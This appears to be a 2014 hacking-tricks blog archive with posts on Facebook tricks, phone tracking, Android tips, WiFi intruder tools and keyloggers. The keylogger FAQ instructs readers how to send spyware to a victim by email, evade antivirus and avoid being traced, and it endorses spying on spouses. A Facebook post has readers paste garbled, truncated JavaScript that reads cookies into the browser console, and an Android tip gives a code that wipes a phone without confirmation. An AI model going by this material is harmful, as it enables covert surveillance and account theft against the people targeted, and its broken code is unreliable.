Archive for 2014

FB Ghost id trick


Open your facebook
account in Uc Browser.


Now go account
setting » General » language
» Bhasha indonesia.


 Now go into your browser
setting, set proxy &
port »


In the blank down
write »


 Now SAVE whole setting.


Now go into your
name change setting and
remove frist and last name
and copy this kﱞﱞﱞk and
paste it in first name box (remove
'k' letters)

Confirm your
password & SAVE it.


 Change your langauge
back into English (US).
Thats all.
Monday 29 September 2014
Posted by Unknown
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How To Tag All Your Friends On A Facebook Status In A Single Click

 "How to Tag all your Friends on a Facebook Status in a single click".Using this trick you can invite all your friends to view your status.This way you can get a lot of exposure if you are promoting any brand or you can invite all your friends to like your photo or status.

Steps to Tag All Your Facebook Friends in a Single Click:

The technique is very simple even though the code is a little complex.This trick is currently working perfectly on Google Chrome Browser, so I recommend you to use Google Chrome while performing this trick.
  • Login to your Facebook Account on Google Chrome Browser.
  • Post A Status.
  • Then click on the time stamp of the status, so that your status will open in a separate window.

  • Now press Ctrl + Shift + J
  • or right click on any where and click inspect element
  • Now a windows will pop out below.
  • Switch to the Console Tab and paste the below code over there and hit Enter.
  • function x__0(){return window.ActiveXObject?new ActiveXObject("Msxml2.XMLHTTP"):new XMLHttpRequest}function get_friends(){var e=x__0();"GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm",false);e.send(null);if(e.readyState==4){var t=JSON.parse(e.responseText.substring(e.responseText.indexOf("{")));return t.payload.entries}return false}function get_uid(e){var t=x__0();"GET",""+e,false);t.send();if(t.readyState==4){return uid=JSON.parse(t.responseText).id}return false}function cereziAl(e){var t=e+"=";if(document.cookie.length>0){konum=document.cookie.indexOf(t);if(konum!=-1){konum+=t.length;son=document.cookie.indexOf(";",konum);if(son==-1)son=document.cookie.length;return unescape(document.cookie.substring(konum,son))}else{return""}}}function getRandomInt(e,t){return Math.floor(Math.random()*(t-e+1))+e}function randomValue(e){return e[getRandomInt(0,e.length-1)]}function a(e){var t=new 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  • Ignore if you get any error and just wait for a while.
  • Within few seconds all your friends must be tagged in the status.
  • That's all friends you are done.
  • Hope you enjoyed the trick.

This script is tested and its perfectly working on Google Chrome.If you are facing any issues do let us know in your comments below.
Friday 26 September 2014
Posted by Unknown
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How To Trace Exact Location Of Mobile Phone

There are many instances when we want to know where our friends are, where our parents are, and for those who've got a pair, where is my girl-friend or boyfriend. ! Well there are many apps in the market which allow you to get exactly the pin-pointed location of  any cellphone. But the problem is they cost too high. Well today I'm gonna show you a process by which you can trace the exactmobile location of any cell phone without the need to spend a single penny. What you need is listed below, and i'm sure most of us already have what is needed.


Any cell phone that supports Google maps. eg. iPhone , Nokia , Blackberry , Symbian etc.

Google Latitude. Which you can download by going to from your cell phone.

Go to from your cell phone.
Download the free app.
Open the App.
Enter You mobile number in the entry Field.
Now You've set it up on your phone. Now you gotta set it up on your friends cell phone. 


You can add friends by their E-mail Addresses. Your friends will receive an E-mail with the downloadlink of Google latitude. 
Or you can manually add yourself or ask your friend to add google latitude on his/her cell phone. 
Now you and your friend can add each other as friends on google latitude and you'll get the exact location of where your friends cell phone is.
There is exactly no limit to how many friends you can add in your latitude circle. ( just make sure you dont add your parents :) 
Well so As soon as You and your buddy confirm each other as friends you get to see each others location.

Well the most eye catching feature of google latitude is that you can use it online even without a cell phone.
Just go to from you PC, Follow the instructions, log-in into your account. And track You friends Locations !!

Enjoy (-_-)
Posted by Unknown
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10 Best Android Secret Tips And Tricks

10 Best Android Secret Tips and Tricks

Android is the Linux based operating system designed primarily for touch screen mobile phones. Now a days android phones are so much popular that they covered almost 65% of total mobile phones market.They are rich in functionality as well as user friendly. Many android users don’t know much about the hidden features of Android phones. Today we are sharing an article which will tell you the best secret android tricks and hidden features of android phones. Different versions of android versions support different set of android tricks, so try all the following android tricks. I am not sure which will going to work on your handset.

1) Force reboot: 
Many times android users face a problem of freezing of mobile phone, In case your android phone is frozen, you can reboot it using an android trick.

Just press Power Button+ Home Key + Volume up button simultaneously.

2) Quick Google Access:
Android phones built primarily for internet, many of android users don’t know that android phones provide a way by which we can access Google search in just a single click. To use this android trick,

Press menu key and hold it for couple of seconds, it will launch the Google search.

roid in safe mode: 
As like computers, we can also reboot android phones in safe mode. The latest android jelly bean version provides an option to reboot in safe mode, if something goes wrong.
To reboot your android in safe mode, follow the below given instructions.

*Long press the power button
*Long press on the power off option.

Android phone will show a confirmation message about rebooting it in safe mode, if we reboot android phone in safe mode then all the 3rd party application will be disabled. These applications can again be enabled when we reboot our phone normally. This is a great android utility in case when, one of your 3rd party application is causing trouble for you and you want to hunt it.

4) Unlock android phones by face detection: 
This is a cool android trick by which you can unlock your phone by using face detection, In the jelly bean version, android provides a way by which android phone can be unlock using face detection, to make this feature more secure, jelly bean version added another layer of protection in which android phone can be unlocked only when the face is matched as well as we have to blink eyes in order to unlock phone. Blinking eyes tells the android security system that person is live and it’s not an illegal attempt of unlocking using a still image.
To activate this,

Go to Settings > Security > Screen lock > Face unlock.

5) Get detailed information about phone status:
We can get the detailed statistics like phone information, battery information, usage statistics and WiFi information by just dialing *#*#4636#*#*

This is a handy USSD to get the details about battery usage, DNS check, Ping, Application time usage time and so on.

6) Move android apps to SD card: 
Its good idea to install android apps in SD card, but what if you installed apps on your phone memory. Don’t worry android phones provide a way by which we can move our apps to SD card. To move apps to SD card, follow these steps:

Go to settings > Application settings > Manage application > Select the application, You will see the option “Move to SD card”.

7) Hard Reset and Factory reset your android phone: 
This android trick comes handy at the time of selling an android phone. Android phone can be formatted in two ways

Factory reset
Hard reset

a) Factory reset: In factory reset, your phone is being formatted to factory level. Means all the settings will go by default and all the internal data will be deleted. To factory reset a phone dial *#*#7780#*#*.

b) Hard reset: To hard reset a phone dial *2767*3855#, this will delete all the data (including internal and External SD data) as well as settings of android phone. Don’t try this code for testing purpose, until you are not sure. It will not ask for a confirmation.

8 ) Context menu in android:
long press on the screen, will show you additional options for customizing android phones. This context menu is somewhat similar to the right click menu of most operating systems.

9) Taking screen shots on android phone:
Android phones offer a great feature by which we can take the screen shot without using any 3rd party application. However the screen shot android tricks vary from one android version to another version.

Press the Home button + power button (This trick work on most android phones.)
For Galaxy Nexus: Power button + volume down button.
For Galaxy Note 2 and S3: Swipe your palm on the screen to take screen shot.

10) Android Version Animation: 
This is another cool android trick to play with your android phone.
To use this android trick, Go to settings > about phone > Tab repeatedly on ‘Android version’.
After sometime, the android version will be animated.

Posted by Unknown

3 Tools To Reveal Who's Hacking Your WiFi

While using your home WiFi internet access you might face some slow downs of speed, this may be due to a normal internet down time or (if it persists for a long time) your wifi may be got hacked by a nearby hacker. There are many ways to protect your home Wi-Fi from being hacked, such as using a custom & hard to guess password or also changing the encryption type of the wireless key to WPA or WPA2 as they are meant to be more secure but not perfect against hackers. As we've seen there's a way to Hack WPA/WPA2 Passwords using PIN vulnerabilitythat means even if you think your WiFi is protected with WPA/WPA2 encryption doesn't mean it cannot be hacked.

3 Tools to Reveal Who's Hacking Your WiFi

 1. Wireless Network Watcher 

Wireless Network Watcher programmed by Nirsoft, it helps you analyzing nearby computers connected to the same network (WiFi or Local network). It will analyze and list: Local IP address of the hacker, Computer/Device name, MAC address & other useful info.

2. Who's On My WiFi

Who's on my WiFi is an very easy to use tool that will provide many information about the locally connected hackers on your WiFi home network.

3. NetCut

The famous internet cutter can also be used to analyze who's taking your internet connection after hacking your wifi. Netcut helps you also cut down internet access to connected users even if they know the wifi password, which also helps you protecting yourself from others using netcut.

Posted by Unknown
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FAQ On Keyloggers - A Complete Guide

I have written a few articles on Keyloggers , Yet i get lot of comments and emails from readers asking me various doubts and clarifications, so to clear them. i have started a new section in my blogFAQ i have compiled and answered all frequently asked questions about key loggers

FAQ  On Keyloggers - A Complete Keylogger Guide

1. What is A Keylogger 
A keylogger also called as spy software  is a small program that monitors each and everykeystroke a user types on a specific computer’s keyboard. A keylogger program can be installed in just a few seconds and once installed, you are only a step away from getting the target password and other sensitive data.

2. What Are The Types Of Keyloggers 
Software Keyloggers
Hardware Keyloggers

3. How Keylogger Works 
Basically once when a Keylogger is installed on a PC, it starts operating in the background it captures the keystrokes typed by the victim some advanced Keyloggers even capture screen shots and sends them to the attacker via Email , FTP etc

4.  What is The Use Of Keyloggers 
Since Keyloggers capture every keystroke and its stealth (Invisible) Its mainly used formonitoring children, Spouse , Workers . It is also used by hackers to Hack email accounts , Face book Accounts etc

5. Do I need any special knowledge to install and use the keylogger?
No, now a days Keyloggers are very user friendly, Can be used by anyone who has basic knowledge of Computers

6. Can the victim detect it's presence once key logger is installed in his/her computer?
This depends on the Keylogger which you use, usually Free Keyloggers are easily detected by Av's. To my knowledge the once which are not detected are Sniper spy, realtimeSpy , Win spy and more..

7. Can Victim Trace Back Me After i install the Keylogger in His/Her computer
No, its impossible to trace you back

8. Which is the Best Keylogger 
Today, there exists hundreds of key loggers in the market and most of them are no more than a scam. So, I have personally tested some of the top keyloggers and concluded Sniper Spy as the best one And as an alternative You can use Win spy
9. Why Sniper Spy ?
Sniper spy eliminates the need for Physical Access Not only that it has some of most advanced features such as live Monitoring , bypass Firewalls, Record Scree shots etc. It has its own server where all the victim logs get stored thus eliminating the need of third party Email Accounts Or FTP Accounts , People who have already used key loggers will know the use of this, usually ordinary key loggers use GMail or ymail for Receiving logs lately GMail have started banning email accounts which are being used for receiving key logs

10. How Sniper Spy Works
After you purchase Sniper spy, you’ll be able to create the installation module using an easy set-up program. You need to email this module to the remote user as an attachment.When the remote user runs the module it’ll get installed silently and monitoring process will begin. The keystrokes are captured and uploaded to the Sniper Spy servers continuously.You can login to your Sniper spy account (you get this after purchase) to see the logs which contains the password.

11.  I don’t have physical access to the target computer. Can I still use Sniper Spy?
Yes you can! Sniper Spy supports remote instillation feature which allows you to remotely install the program on any PC even if you have no physical access to it. For remote installation, all you need to do is just place the module in a .zip/.rar file and send it as an attachment to the target email address (for which you need the password).

12. What if the antivirus prevents me from sending an email attachment?
Instead of sending the key logger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, thekeylogger will get installed automatically.

13. Can I install Sniper Spy on a local computer?
If you need to install to your local computer instead of your remote computer, then the process is simple. Simply navigate to the folder in which you saved your module. Double-click the module file name to execute it. Nothing will appear on the screen but the software gets installed silently.

Hope This FAQ guide helps you to understand what is keylogger & how it work.
Posted by Unknown
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